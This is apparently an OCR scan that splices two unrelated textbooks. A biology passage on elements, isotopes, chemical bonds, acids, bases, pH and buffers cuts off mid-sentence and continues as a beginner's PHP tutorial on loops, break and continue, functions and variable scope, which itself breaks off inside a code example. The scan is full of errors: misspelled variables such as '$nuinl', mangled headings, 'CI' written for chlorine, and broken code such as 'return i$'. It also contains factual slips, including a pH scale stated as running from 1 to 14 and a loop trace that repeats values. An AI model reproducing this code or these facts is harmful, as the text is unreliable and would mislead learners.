section. 


Elements of elements 


An element is a substance made of atoms that have the same 
number of protons. Think of them as “pure” substances all 
made of the same thing. 


Living things use only a handful of the elements in nature. 
The four most common are hydrogen, carbon, nitrogen, 

and oxygen, all of which are found in air, plants, and water. 
(Several other elements exist in smaller amounts in organ- 
isms, including sodium, magnesium, phosphorus, sulfur, chlo- 
rine, potassium, and calcium.) 


l so dig isotopes 


All atoms of an element have the same number of protons, but 
the number of neutrons can change. If the number of neutrons 
differs between two atoms of the same element, the atoms are 
called isotopes of the element. 


For example, carbon-12 and carbon-14 are two isotopes of 
the element carbon. Atoms of carbon-12 have 6 protons and 
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6 neutrons. These carbon atoms have a mass number of 12 
because their mass is equal to 12. Atoms of carbon-14 still 

have 6 protons (because all carbon atoms have 6 protons), 
but they have 8 neutrons, giving them a mass number of 14. 


Molecules, Compounds, 
and Bonds 


ar 


When you start putting elements together, you get more 
complex forms of matter, such as molecules and compounds. 
Molecules are made of two or more atoms, and compounds are 
molecules that contain at least two different elements. 


One way to sort out the differences among elements, mol- 
ecules, and compounds is to think about making chocolate 
chip cookies. First, you need to mix the wet ingredients: 
butter, sugar, eggs, and vanilla. Consider each of those 
ingredients a separate element. You need two sticks of the 
element butter. When you combine butter plus butter, you 
get a molecule of butter. Before you add the element of eggs, 
you need to beat them. So, when you add egg plus egg in 

a little dish, you get a molecule of eggs. To mix all the wet 
ingredients together, the molecule of butter is combined with 
the molecule of eggs, and you get a compound called “wet.” 
Next, you need to mix together the dry ingredients: flour, salt, 
and baking soda. Think of each ingredient as a separate ele- 
ment. When all the dry ingredients are mixed together, you 
get a compound called “dry.” Only when the wet compound 
is mixed with the dry compound is the reaction sufficiently 
ready for the most important element: the chocolate chips. 


So what holds the elements of molecules and compounds 
together? Bonds, of course. Two important types of bonds 
exist in living things: 


Ionic bonds hold ions joined by their opposite electrical 
charges. Ionic reactions occur when atoms combine and 
lose or gain electrons. When sodium (Na) and chlorine 
(CI) combine, for example, sodium loses an electron to 
chlorine. Sodium becomes the positively charged sodium 
ion (Na*), and chlorine becomes the negatively charged 
chloride ion (CI). These two oppositely charged ions are 
attracted to each other, forming an ionic bond. 
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Covalent bonds form when atoms share electrons ina 
covalent reaction. When two oxygen atoms join to form 
an oxygen molecule, they share two pairs of electrons 
with each other. Each shared pair of electrons is one 
covalent bond, so the two pairs of shared electrons in 
a molecule of oxygen gas have a double bond. Covalent 
bonds are extremely important in biology because they 
hold together the backbones of all biological molecules. 


Acids and Bases 


Some substances, such as lemon juice and vinegar, have a 
real edge when you taste them. Others, such as battery acid 
and ammonia, are so caustic you don’t even want to get them 
on your skin. These substances are acids and bases, both of 
which have the potential to damage cells. 


Acids are molecules that can split apart in water and 
release hydrogen ions (H*). A common example is 
hydrochloric acid (HCI). When HCI is added to water, 
it splits apart into H* and CI, increasing the number of 
hydrogen ions in the water/HC] solution. 


Bases are molecules that can split apart in water and 
release hydroxide ions (OH). The most common exam- 
ple is sodium hydroxide (NaOH). When NaOH is added to 
water, it splits apart into Na* and OH-. 


Charged particles, like hydrogen and hydroxide ions, can 
interfere with the chemical bonds that hold molecules together. 
Because living things are made of molecules, strong acids and 
bases can release enough of these ions to cause damage. 


The relative concentration of hydrogen to hydroxide ions is 
represented by the pH scale. The following sections explain 
the pH scale and how organisms regulate their pH. 


“Ph"iguring out the pH scale 


The pH scale is a system of classifying how acidic or basic a 
solution is. The term pH symbolizes the hydrogen ion concen- 
tration in a solution (what proportion of a solution contains 
hydrogen ions). The pH scale goes from 1 to 14. A pH of 7 is 
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neutral, meaning the amount of hydrogen ions and hydroxide 
ions in a solution with a pH of 7 is equal, just like in pure water. 


A solution that contains more hydrogen ions than hydroxide 
ions is acidic, and the pH of the solution is less than 7. If a 
molecule releases hydrogen ions in water, it’s an acid. The 
more hydrogen ions it releases, the stronger the acid, and the 
lower the pH value. A solution that contains more hydroxide 
ions than hydrogen ions is basic, and its pH is higher than 7. 


Buffing up on buffers 


In organisms, blood and cytoplasm are the “solutions” in 
which the required ions (for example, electrolytes) float. 
That’s why most substances in the body hover around the 
neutral pH of 7. However, nothing’s perfect, so the human 
body has a backup system in case things go awry. A system of 
buffers exists to help neutralize the blood if excess hydrogen 
or hydroxide ions are produced. 


MBER Buffers keep solutions at a steady pH by combining with 

¥ excess hydrogen (H*) or hydroxide (OH)) ions. Think of them 
as sponges for hydrogen and hydroxide ions. If a substance 
releases these ions into a buffered solution, the buffers will 
“soak up” the extra ions. 


The most common buffers in the human body are bicarbonate 
ion (HCO,,) and carbonic acid (H,CO,). Bicarbonate ion car- 
ries carbon dioxide through the bloodstream to the lungs to 
be exhaled, but it also acts as a buffer. Bicarbonate ion takes 
up extra hydrogen ions, forming carbonic acid and preventing 
the pH of the blood from going too low. If the opposite situ- 
ation occurs and the pH of the blood gets too high, carbonic 
acid breaks apart to release some hydrogen ions, which 
brings the pH back into balance. 


Carbon-Based Molecules: 
The Basis for All Life 


All living things rely pretty heavily on one particular type of 
molecule: carbon. The little ol’ carbon atom, with its six pro- 
tons and an outer shell of four electrons, is the central focus 
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of organic chemistry, which is the chemistry of living things. 
When carbon bonds to hydrogen (which happens frequently 
in organic molecules), the carbon and hydrogen atoms share 
a pair of electrons in a covalent bond. Molecules with a lot of 
carbon-hydrogen bonds are called hydrocarbons. Nitrogen, 
sulfur, and oxygen are also often joined to carbon in organisms. 


So where do the carbon-containing molecules come from? The 
answer’s simple: food. Some living things, like people, need 

to eat other living things to get their food, but some organ- 
isms, like plants, can make their own food. Regardless of the 
food source, all living things use food as a supply of carbon- 
containing molecules. 


Carbon atoms are central to all organisms because they’re 
found in carbohydrates, proteins, nucleic acids, and lipids — 
otherwise known as the structural materials of all living 
things. The sections that follow describe the roles of these 
materials. 


Providing energy: Carbohydrates 


Carbohydrates, as the name implies, consist of carbon, 
hydrogen, and oxygen. The basic formula for carbohydrates 
is CH,O, meaning the core structure of a carbohydrate is one 
carbon atom, two hydrogen atoms, and one oxygen atom. 
This formula can be multiplied; for example, glucose has the 
formula C,H,,O,, which is six times the ratio but still the same 
basic formula. 


MBER Carbohydrates are energy-packed compounds. Living crea- 

Š tures can break carbohydrate;$j<=9;$j++) 

{ 

$result = $i * $j; 

echo ''$i X $j = $result\n" ; 

} 

} 

The output is as follows: 

Multiply by 1 
1x1 = 1 
1x2 = 2 

1x8 = 8 
1x9 = 9 

Multiply by 2 
2x1 = 2 
2x2 = 4 

2 X 8 = 16 
2 X 9 = 18 

Multiply by 3 
3x1 = 3 

And so on. 
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The structure of a for loop is quite flexible and allows you to build loops 
for almost any purpose. Although the basic for loop discussed so far in this 
section has one statement in its starting, conditional, and increment sec¬ 
tions, the general format allows more than one statement in each section. 
The general format is: 

for {beginning statements; conditional statements; 
ending statements) 

{ 

block of statements; 

} 

The statements within a for loop have the following roles: 

♦ The beginning statements execute once at the start of the loop. They 
can be statements that set any needed starting values or other statements 
that you want to execute before your loop starts running. 
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♦ The conditional statements are tested for each iteration of your loop. 

♦ The ending statements execute once at the end of the loop. They can be 
statements that increment your values or any other statements that you 
want to execute at the end of your loop. 

Each statement section is separated by a semicolon (;). Each section can 
contain as many statements as needed, separated by commas. Any section 
can be empty. 

The following loop has statements in all three sections: 

$t = 0; 

for ($i=0,$j=l;$t<=4;$i++,$j++) 

{ 

$t = $i + $j; 
echo ''$t<br />”; 

} 

In this example, $i=0 and $ j=l are the beginning statements, $t<=4 is the 
conditional statement, and $i++ and $j++ are the ending statements. 

The output of these statements is as follows: 

1 

3 

5 

The loop is executed in the following order: 

1. The beginning section containing two statements is executed. 

$i is set to 0, and $ j is set to 1. 

2. The conditional section containing one statement is evaluated. 

Is $t less than or equal to 4? Yes, so the statement is true. The loop 
continues to execute. 

3. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 0 + 1, which equals 1. Then 
$t is echoed to give the output 1. 

h. The ending section containing two statements ($i++ and $ j + +) is 
executed. 

Both $i and $ j are incremented by 1, so $i now equals 1, and $ j now 
equals 2. 

5 . The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t is equal to 1 at this point, the 
statement is true. The loop continues to execute. 
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6. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 1 + 2, which equals 3. Then 
$t is echoed to give the output 3. 

7 . The ending section containing two statements ($ i ++ and $ j + +) is 
executed. 

Both $i and $ j are incremented by 1, so $i now equals 2, and $ j now 
equals 3. 

8. The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t now equals 3, the statement is 
true. The loop continues to execute. 

9. The statements in the statement block are executed. 

$t becomes equal to $i plus $j, which is 2 + 3, which equals 5. Then 
$t is echoed to give the output 5. 

io. The ending section containing two statements ($i++ and $ j + +) is 
executed. 

Both $i and $ j are incremented by 1, so $i now equals 2, and $ j now 
equals 3. 

/ 1. The conditional section is evaluated. 

Is $t less than or equal to 4? Because $t now equals 5, the statement is 
not true. The loop doesn’t continue to execute. The loop ends, and the 
script continues to the next statement after the end of the loop. 

Usin^ white (oops 

Awhile loop continues repeating as long as certain conditions are true. The 
loop works as follows: 

1. You set up a condition. 

2 . The condition is tested at the top of each loop. 

3. If the condition is true, the loop repeats. If the condition is not true, the 
loop stops. 

The following is the general format of a while loop: 

while ( condition ) 

{ 
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block of statements 
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The following statements set up a while loop that looks through an array 
for an apple: 

$fruit = array ( "orange”, "apple", "grape" ); 

$testvar = "no"; 

$k = 0; 

while ( $testvar != "yes" ) 

{ 

if ($fruit[$k] == "apple" ) 

{ 

$testvar = "yes"; 
echo "appleXn"; 

} 

else 

{ 

echo "$fruit[$k] is not an appleXn"; 

} 

$k++; 


These statements generate the following output: 

orange is not an apple 
apple 

The script executes the statements as follows: 

1. The variables are set before starting the loop. 

$ fruit is an array with three values, $testvar is a test variable set to 
"no ", and $k is a counter variable set to 0. 

2 . The loop starts by testing whether $testvar != "yes" is true. 

Because $testvar was set to "no ", the statement is true, so the loop 
continues. 

3 . The condition in the if statement is tested. 

ls$fruit[$k] == "apple" true? At this point, $k is 0, so the script 
checks $fruit [0] . Because $fruit [0] is " orange ", the statement is 
not true. The statements in the if block aren’t executed, so the script 
skips to the else statement. 

4 . The statement in the else block is executed. 

The else block outputs the line "orange is not an apple ". This is 
the first line of the output. 

5 . $k is incremented by one. 

Now $k becomes equal to 1. 
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6. The bottom of the loop is reached. 

Flow returns to the top of the while loop. 

7 . The condition $testvar != "yes" is tested again. 

Is $testvar ! = "yes " true? Because $testvar hasn’t been changed 
and is still set to "no", it is true, so the loop continues. 

8. The condition in the i f statement is tested again. 

ls$fruit[$k] == "apple" true? At this point, $k is 1, SO the script 
checks $fruit [1] . Because $fruit [1] is "apple", the statement is 
true. So the loop enters the if block. 

9. The statements in the if block are executed. 

These statements set $testvar to "yes" and output "apple". This is 
the second line of the output. 

io. $k is incremented again. 

Now $k equals 2. 

/ 1. The bottom of the loop is reached again. 

Once again, the flow returns to the top of the while loop. 

12. The condition $testvar != "yes " is tested one last time. 

Is $testvar ! = "yes " true? Because $testvar has been changed 
and is now set to "yes ", it is not true. The loop stops. 

It’s possible to write a while loop that is infinite — that is, a loop that loops 
forever. You can easily, without intending to, write a loop in which the con¬ 
dition is always true. If the condition never becomes false, the loop never 
ends. For a discussion of infinite loops, see the section “Avoiding infinite 
loops,” later in this chapter. 


Usin0 do..white (oops 

A do. .while loop is very similar to awhile loop. Like awhile loop, a 
do. .while loop continues repeating as long as certain conditions are true. 
Unlike while loops, however, those conditions are tested at the bottom of 
each loop. If the condition is true, the loop repeats. When the condition is 
not true, the loop stops. 
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The general format for a do. .while loop is as follows: 


do 

{ 

block of statements 
} while ( condition ); 
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The following statements set up a loop that looks for an apple. This script 
does the same thing as the script in the preceding section that uses a while 
loop: 

$fruit = array ( "orange”, "apple", "grape" ); 

$testvar = "no"; 

$k = 0; 
do 
{ 

if ($fruit[$k] == "apple" ) 

{ 

$testvar = "yes"; 
echo "appleXn"; 

} 

else 

{ 

echo "$fruit[$k] is not an appleXn"; 

} 

$k++; 

} while ( $testvar != "yes" ); 

The output of these statements in a browser is as follows: 

orange is not an apple 
apple 

This is the same output shown for the while loop example. The difference 
between a while loop and a do. .while loop is where the condition is 
checked. In a while loop, the condition is checked at the top of the loop. 
Therefore, the loop will never execute if the condition is never true. In 
the do. .while loop, the condition is checked at the bottom of the loop. 
Therefore, the loop always executes at least once, even if the condition is 
never true. 

For example, in the preceding loop that checks for an apple, suppose the 
original condition is set to yes, instead of no, by using this statement: 

$testvar = "yes"; 

The condition tests false from the beginning. It is never true. In a while 
loop, there is no output. The statement block never runs. However, in a 
do. .while loop, the statement block runs once before the condition is 
tested. Thus, the while loop produces no output, but the do. .while loop 
produces the following output: 

orange is not an apple 

The do. .while loop produces one line of output before the condition is 
tested. It doesn’t produce the second line of output because the condition 
tests false. 
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At/oidin^ infinite (oops 

You can easily set up loops so that they never stop. These are called infinite 
loops. They repeat forever. However, seldom does anyone create an infinite 
loop intentionally. It’s usually a mistake in the programming. For example, 
a slight change to the script that sets up a while loop can make it into an 
infinite loop. 

Here is the script shown in the section “Using while loops,” earlier in this 
chapter, with a slight change: 

$fruit = array ( "orange", "apple", "grape" ); 

$testvar = "no"; 

while ( $testvar != "yes" ) 

{ 

$k = 0; 

if ($fruit[$k] == "apple" ) 

{ 

$testvar = "yes"; 
echo "appleXn"; 

} 

else 

{ 

echo "$fruit[$k] is not an appleXn"; 

} 

$k++; 


The small change is moving the statement $k = 0; from outside the loop 
to inside the loop. This small change makes it into an endless loop. This 
changed script has the following output: 


orange 

is 

not 

an 

apple 

orange 

is 

not 

an 

apple 

orange 

is 

not 

an 

apple 

orange 

is 

not 

an 

apple 
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This will repeat forever. Every time the loop runs, it resets $k to 0. Then it 
gets $ fruit [ 0 ] and echoes it. At the end of the loop, $k is incremented to 1. 

However, when the loop starts again, $k is set back to 0. Consequently, only 
the first value in the array, orange, is ever read. The loop never gets to the 
apple, and $testvar is never set to "yes" . The loop is endless. 

Don’t be embarrassed if you write an infinite loop. We guarantee that the 
best programming guru in the world has written many infinite loops. It isn’t a 
big deal. If you’re testing a script and get output repeating endlessly, there’s 
no need to panic. Do one of the following: 
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♦ If you’re using PHP on a web page: Wait. It will stop by Itself in a short 
time. The default time is 30 seconds, but the timeout period might have 
been changed by the PHP administrator. You can also click the Stop 
button on your browser to stop the display in your browser. 

♦ If you’re using PHP CLI: Press Ctrl+C (or Cmd+C on a Mac). This stops 
the script from running. Sometimes the output will continue to display a 
little longer, but it will stop very shortly. 

Then figure out why the loop is repeating endlessly and fix it. 

A common mistake that can result in an infinite loop is using a single equal 
sign (=) when you mean to use double equal signs (==). The single equal 
sign stores a value in a variable; the double equal signs test whether two 
values are equal. The following condition using a single equal sign is always 
true: 

while ($testvar = "yes") 

The condition simply sets $testvar equal to "yes" . This isn’t a question 
that can be false. What you probably meant to write is this: 

while ($testvar == "yes") 

This is a question asking whether $testvar is equal to "yes" , which can 
be answered either true or false. 

Another common mistake is to leave out the statement that increments the 
counter. For example, in the script earlier in this section, if you leave out the 
statement $k;++;, $k; is always 0, and the result is an infinite loop. 

Breaking out of a hop 

Sometimes you want your script to break out of a loop. PHP provides two 
statements for this purpose: 

♦ break: Breaks completely out of a loop and continue with the script 
statements after the loop. 

♦ continue: Skips to the end of the loop where the condition is tested. 

If the condition tests positive, the script continues from the top of the 
loop. 

The break and continue statements are usually used in conditional 
statements. In particular, break is used most often in switch statements, 
discussed earlier in this chapter. 
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The following statements show the difference between continue and 
break. This first chunk of code shows an example of the break statement: 

$counter = 0; 

while ( $counter < 5 ) 

{ 

$counter++; 

If ( $counter == 3 ) 

{ 

echo "breakXn"; 
break; 

} 

echo "Last line in loop: counter=$counter\n"; 

} 

echo "First line after loop\n\n"; 

The output of this statement is the following: 

Last line in loop: counter=l 
Last line in loop: counter=2 
break 

First line after loop 

Notice that the first loop ends at the break statement. It stops looping and 
jumps immediately to the statement after the loop. That isn’t true of the 
continue Statement. 

The following code gives you an example of the continue statement: 

$counter = 0; 

while ( $counter < 5 ) 

{ 

$counter++; 

If ( $counter == 3 ) 

{ 

echo "continueXn”; 
continue; 

} 

echo "Last line in loop: counter=$counter\n"; 

} 

echo "First line after loopin''; 

The output of this statement is the following: 

Last line in loop: counter=l 

Last line in loop: counter=2 

continue 

Last line in loop: counter=4 

Last line in loop: counter=5 

First line after loop 
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Unlike the break statement loop, this loop does not end at the continue 
statement. It just stops the third repeat of the loop and jumps back up to the 
top of the loop. It then finishes the loop, with the fourth and fifth repeats, 
before it goes to the statement after the loop. 


One use for break statements is insurance against infinite loops. The follow¬ 
ing statements inside a loop can stop it at a reasonable point: 



$test4infinitY++; 

if ($test4infinity > 100 ) 

{ 

break; 

} 

If you’re sure that your loop should never repeat more than 100 times, 
use these statements to stop the loop if it becomes endless. Use whatever 
number seems reasonable for the loop you’re building. 


Usin^ Functions 

Applications often perform the same task at different points in the script or 
in different scripts. Functions are designed to allow you to reuse the same 
code in different locations. A function is a group of PHP statements that per¬ 
form a specific task. You can use the function wherever you need to perform 
the task. 


For example, suppose you display your company logo frequently throughout 
your website with the following statements: 

echo "<p><img src='Images/logo.jpg' width='50' height='50' 
hspace='10' align='left' /></p>"; 
echo "<p stYle='font-size: x-large'>M y Fine Company</p>"; 
echo "<p stYle='font-style: italic'>quality products</p>"; 

Rather than typing this code in every place in your scripts where you want 
to display your logo, you can create a function that contains the statements 
and name it displaY_logo. Then, you can just use the function whenever 
you want to display your logo. Using the function looks like this: 

display_logo(); 

You can see that using this one line saves a lot of typing and is easier to read 
and understand than typing the echo statements everywhere the logo is 
needed. In the sections that follow, we tell you how to create and call a func¬ 
tion, use variables within functions, pass and return values to and from 
functions, and simplify your work with PHP’s built-in functions. 
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Creating a function 

You can create a function by putting the code into a function block. The 
general format is as follows: 

function functionnameO 
{ 

block of statements; 
return; 

} 

For example, you can create the function display_logo () that we discuss 
in the preceding section with the following statements: 

function displaY_logo() 

{ 

echo "<p><img src='Images/logo.jpg' width='50' height='50' 
hspace='10' align='left' /></p>''; 
echo "<p style= ' font-size : x-large'>My Fine Company</p>''; 
echo ''<p style= ' font-style: italic ' >quality products</p>" ; 
return; 

} 

You can then call the function anywhere you want to display the logo, as 
follows: 

display_logo(); 

The return statement at the end of the preceding function stops the function 
and returns control to the main script. A return statement isn’t needed at 
the end of the function, because the function stops at the end anyway and 
returns control to the calling script. However, the return statement makes 
the function easier to understand. The return statement is discussed in 
more detail in the section “Returning a value from a function,” later in this 
chapter. 

You can create a function with a function-definition statement anywhere in 
the script, but the usual practice is to put all the functions together at the 
beginning or the end of the script. Functions that you plan to use in more 
than one script can be defined in a separate file that you include in any 
scripts that need to use the functions. Including files in scripts is discussed 
in the section, “Organizing Scripts,” later in this chapter. 

Usin^ Oariabtes in functions 

You can create and use a variable inside your function. Such a variable is 
called local to the function. However, the variable isn’t available outside of 
the function; it isn’t available to the main script. If you want to use the vari¬ 
able outside the function, you have to make the variable global, rather than 
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local, by using a global statement. For instance, the variable $name is 
created in the following function: 

function format_name() 

{ 

$first_name = "John"; 

$last_naine = "Smith"; 

$name = $last_name, ".$first_name; 

} 

format_name() ; 
echo "$name"; 

These statements don’t produce any output, in the echo statement, $name 
doesn’t contain any value. The variable $name was created inside the function, 
so it doesn’t exist outside the function. 


You can create a variable inside a function that does exist outside the function 
by using the global statement. The following statements contain the same 
function with a global statement added: 

function format_name() 

{ 

global $name; 

$first_name = "John"; 

$last_name = "Smith"; 

$name = $last_name . ", " . $first_name; 

} 

format_name(); 
echo "$name"; 

The script now echoes this: 

Smith, John 



You must make the variable global before you can use it. If the global state¬ 
ment follows the $name assignment statement, the script doesn’t produce any 
output. That is, in the preceding function, if the global statement followed 
the $name = Statement, the function wouldn’t work correctly. 


Similarly, if a variable is created outside the function, you can’t use it inside 
the function unless it’s global. In the following statements, the only global 
statement is inside the function: 


$first_name = "John"; 

$last_name = "Smith"; 
function format_name() 

{ 

global $first_name, $last_name; 

$name = $last_name.", ".$first_name; 
echo "$name"; 

} 

format_name(); 


Usin 0 Functions 369 


Because the code didn’t include a global statement outside the function, 
$last_name and $f irst_name inside the function are different variables 
than $last_name and $f irst_name created in the script outside the func¬ 
tion. The variables $last_name and $f irst_name inside the function are 
created when you name them and have no values. Therefore, $name echoes 
only a comma, as follows: 


You need the global statement for the function to work correctly. 

Passing t/atues to a function 

You pass values to a function by putting the values between the parentheses 
when you call the function, as follows: 

functionname{value,value ,...); 

Of course, the variables can’t just show up. The function must be expecting 
them. The function statement includes variables’ names for the values it’s 
expecting, as follows: 

function functionname ($varnainel, $varnaine2, . . . ) 

{ 

statements 

return; 

} 

For example, the following function computes the sales tax: 

function compute_salestax($amount,$custState) 

{ 

switch ( $custState ) 

{ 

case "OR" : 

$salestaxrate = 0; 
break; 
case "CA" : 

$salestaxrate = 1.0; 
break; 
default: 

$salestaxrate = .5; 
break; 

} 

$salestax = $amount * $salestaxrate; 
echo "$salestax<br />"; 

} 
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The first line shows that the function expects two values — $ amount and 
$custState. When you call the function, you pass it two values, as follows: 

$amount = 2000.00; 

$custState = "CA"; 

compute_salestax($amount,$custState); 

In this case, the amount passed in is 2000.00 and the state is CA. The output 
is 2000, because the salestaxrate for CA is 1.0. 

Passing the ri^ht tifpe of Uatues 

You can pass values directly. Including computed values, or you can pass 
variables containing values. The following calls are valid: 

compute_salestax(2000,"CA") ; 
compute_salestax(2*1000, "") ; 
compute_salestax(2000,"C"."A") ; 

You can pass values of any data type. See Chapter 1 in this minibook for 
a discussion of data types. Generally, you want to test the values that are 
passed to check whether the values are the expected data type. For example, 
the following function expects an array: 

function add_nuinbers ($nuinbers) 

{ 

if(is_arraY($numbers)) 

{ 

for($i=0;$i <sizeof($nurnbers);$i++) 

{ 

@$sum = $sum + $nuinbers [ $i] ; 

} 

echo $sum; 

} 

else 

{ 

echo "value passed is not an array"; 
return; 

} 


You can use the following statements to call the add_numbers function: 

$arraYofnumbers = array(100,200); 
add_numbers($arraYOfnumbers); 

The function displays 300, which is the sum of 100 plus 200. If the value 
passed isn’t an array, as follows: 


add_numbers(100); 
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the function displays the message: 

value passed is not an array 


Passing (/atues in the correct order 

The function receives the values in the order they are passed. That is, suppose 
you have the following function: 

function functionx($x,$ y,$ z) 

{ 

do stuff 

} 

You call the function, as follows: 

functionx($varl,$var2,$var3); 

functionx sets $x=$varl, $y=$var2, and $z = $var3. 

If the values you pass aren’t in the expected order, the function uses the 
wrong value when performing the task. For instance, perhaps your definition 
for a function to compute sales tax looks like the following: 

function compute_salestax($orderCost, $custState) 

{ 

compute tax 

} 

Here, $orderCost is the cost of the order, and $custState is the state 
the customer resides in. But suppose you use the following call: 

compute_salestax($custState,$orderCost); 

The function uses the value of the $custState variable as the cost of the 
order, which it sets to 0, because it is a string. It sets the $custState 
variable to the number in $orderCost, which wouldn’t match any of its 
categories. The output would be 0. 

Passing the ri^ht number of (/atues 

A function is designed to expect a certain number of values to be passed to it. 
If you don’t send enough values, the function sets the missing one(s) to null. 
If you have your warning message level turned on, a warning message is dis¬ 
played. (See the section about understanding error messages in Chapter 1 
in this minibook for a description of error levels.) For example, suppose you 
have the following function that formats a name: 
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function format_name ($f irst_name, $last_naitie) 

{ 

$name = "$last_name, ”.$first_name; 
echo $name; 

} 

The function expects two values to be passed to it. Suppose you call it with 
the following statement: 

format_name("John"); 

You see a message similar to the following: 

Warning: Missing argument 2 for format_name() in testing.php 
on line 9 

However, warnings don’t stop the script; it continues to run. So, the script 
outputs the following: 

, John 

If you send too many values, the function ignores the extra values. In most 
cases, you don’t want to pass the wrong number of values, although this can 
be useful in a few rare instances. 

You can set default values to be used when a value isn’t passed. The defaults 
are set when you write the function, as follows: 

function add_2_numbers($numl=l,$num2=l) 

{ 

$total = $numl + $num2; 
echo "total = $total"; 

} 

If one or both of the values aren’t passed to the function, the function 
uses the assigned defaults, but if a value is passed, it is used instead of the 
default. For instance, you might use one of the following calls: 

add_2_numbers(2,2) ; 
add_2_numbers(2) ; 
add_2_numbers(); 

The results are, in consecutive order: 

$total = 4 
$total = 3 
$total = 2 
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Passing i/aiues reference 

When you pass values into variables in the function definition as shown so 
far, you’re passing by value. Passing by value is the most common way to 
pass values to a function, as follows: 

function add_l($numl) 

{ 

$numl = $nuinl + 1 ; 

} 

When passing by value, copies are made of $numl and are passed to the 
function. While $numl is changed inside the function, by adding 1 to it, the 
variable $numl outside of the function is not changed. So, if you call the 
function with the following statements: 

$numl = 3 ; 
add_l($numl); 
echo $numl; 

The output is 

3 

$nuinl Still contains the same value as it did before you called the function. 
You can change this by making the variable global inside the function or by 
returning $numl from the function after it’s changed and calling the func¬ 
tion, as follows: 

$numl = add_l ($nuinl) ; 

The new value of $numl is returned from the function and stored in $numl 
outside the function. 


In some cases, you want to change the values of variables directly, changing 
their values outside the function. Passing by reference is used for this task. 
To pass a variable by reference, add & before the variable name, as follows: 

function add_l(&$numl) 

{ 

$numl = $numl + 1; 

} 
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When you call this function, a pointer to the location of the variable is 
passed, rather than a copy of the variable. That is, the function call passes 
a pointer to the container called $num where the value 3 is stored. When 
you change the variable with statements inside the function, the value at the 
original location is changed. So, if you call the function with the following 
statements: 
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$nuinl = 3 ; 
add_l($numl); 
echo $numl; 

the output is 

4 

Because you’re passing a pointer to a variable, the following doesn’t make 
sense: 

add_l(&7); 

Passing by reference is used mainly when passing really large values, such 
as an object or a large array. It’s more efficient to pass a pointer than to pass 
a copy of really large values. 

Returning a t/aiue from a function 

If you want a function to send a value back to the main script, use the 
return statement. The main script can put the value in a variable or use it 
in any manner it would use any value. 

To return a value from the function, put the return statement in the function. 
The general format is 

return value; 

For instance, the function that adds two numbers might look like this: 

function add_2_numbers($numl,$num2) 

{ 

$total = $numl + $num2; 
return $total; 

} 

The total of the two numbers is returned. You call the function, as follows: 
$suin = add_2_nuinbers (5,6) ; 

$sum then equals the value in $total that was returned from the 
function — 11. In fact, you could use a shortcut and send the total back 
to the main script with one statement: 

return $numl + $num2; 

The main script can use the value in any of the usual ways. The following 
statements use the function call in valid ways: 
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$total_height = add_2_numbers($heightl,$height2); 

$totalSize = $current_size + add_2_nurrLbers ($sizel, $size2 ) ; 

if (add_2_numbers($costSock;s,$costShoes) > 200.00 ) 

$echo "No sale"; 

A return statement can return only one value. However, the value returned 
can be an array, so you can actually return many values from a function. 

You can use a return statement in a conditional statement to end a function, 
as follows: 


function find_value($arraY,$value) 

{ 

for ($i = l;$i<sizeof($array);$i++) 

{ 

if ($arraY[$i] = $value) 

{ 

echo "$i. $arraY[$i] <br />"; 
return; 

} 

} 


The function checks an array to see whether it contains a value. For instance, 
you can call the function with the following statements: 

$names = arrayf"Joe","Sam","Juan"); 
find_value($names,"Sam"); 


The function searches through the values in the array searching for Sam. If it 
finds Sam, it stops searching. The output shows the array item where Sam is 
found, as follows: 


1. Sam 

Often functions are designed to return Boolean values (true or false), as in 
the following function: 

function is_over_100($number) 

{ 

if($number > 100) 

{ 

return true; 

} 

else 

{ 

return false; 

} 
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Numbers equal to or less than 100 return false; numbers over 100 return 
true. Another common function design returns a value if the function suc¬ 
ceeds but returns false if the function does not succeed. For instance, you 
can design the f ind_value function as follows: 

function find_value($arraY,$value) 

{ 

for($i=l;$i<sizeof($array);$i++) 

{ 

if($arraY[$i] == $value) 

{ 

return i$; 

} 

} 

return false; 

} 

If the function finds the value in the array, it returns the number of the array 
element where it found $value. However, if it doesn’t find the value any¬ 
where in the array, it returns false. 

Usin0 buitt-in functions 

PHP’s many built-in functions are one reason why PHP is so powerful and 
useful. The functions included with PHP are normal functions. They’re no dif¬ 
ferent than functions you create yourself. It’s just that PHP has already done 
all the work for you. 

You can call PHP’s built-in functions the same way you call functions you 
create yourself. You use the function name and pass any values the function 
needs. We discuss specific PHP functions throughout the book. For instance, 
earlier in this chapter, we discuss several functions that you can use to 
check whether a variable exists or whether it’s empty. Here are a couple of 
those functions: 

isset($varname) 
empty($varname) 

The PHP online documentation describes all the built-in functions at www. 
php.net/manual/en/funcref .php. In addition, the PHP documentation 
provides a search function that’s very useful when you remember the name 
of the function but can’t remember the exact syntax. Type the function name 
in the Search For text box at the top of the wet? page and choose Function 
List from the drop-down list. 
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Organizing Scripts 

A script is a series of PHP statements, and each statement performs an 
action. PHP starts at the beginning of the script and executes each statement 
in turn. Some statements are complex statements that execute simple state¬ 
ments conditionally or repeatedly. 

An application often consists of more than one PHP script. In general, one 
script performs one major task. For instance, an application might include 
a script to display a form and a script that stores the data in a database. 
However, this is a guideline, rather than a rule. Some scripts both display a 
form and process the form data. 

Each script should be organized into sections for each specific task. Start 
each section with a comment describing what the section does. (We cover 
writing comments in Book 11, Chapter 1.) Separate sections from each other 
with blank lines. For instance, a login script might have sections as follows: 

ttdisplay the login form 

statements that display the login form 

#check for valid user name and password 

statements that check for valid user name and password 

ttdisplay first page of website or error message 

statements that display the site if user had valid login 
or error message if login invalid 



The goal is to make the script as clear and understandable as possible. 
Scripts need to be maintained and updated over a period of time, often not 
by the person who created them. The more clear and understandable they 
are, the easier to maintain and update they are. 


The following sections give you some tips and tricks for organizing your PHP 
scripts in a way that simplifies your programming tasks. 


Sepamtin^ disptai^ code from to^ic code 

One principle of good practice for writing an application is to separate the 
PHP programming logic from the HTML that displays the web page. To do 
this, the HTML that displays the page is put in a separate file. This file can 
then be used in the script wherever the web page needs to be displayed. You 
can store the HTML code that displays a form in a separate file and then use 
that code whenever the form needs to be displayed. Not only does it make 
your PHP script easier to read, but it also makes changing the form simpler. 
You can make the changes just in the file that contains the HTML code 
rather than having to find everywhere the application displays the form and 
make the changes at every location. 
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For example, suppose your customer adds an item to a shopping cart. 

On the shopping cart web page, you include two buttons — one that says 
Continue Shopping and one that says Log Out. When the user clicks either 
button, the following PHP script is executed: 


<?php 

if($button == "Continue Shopping") 
{ 

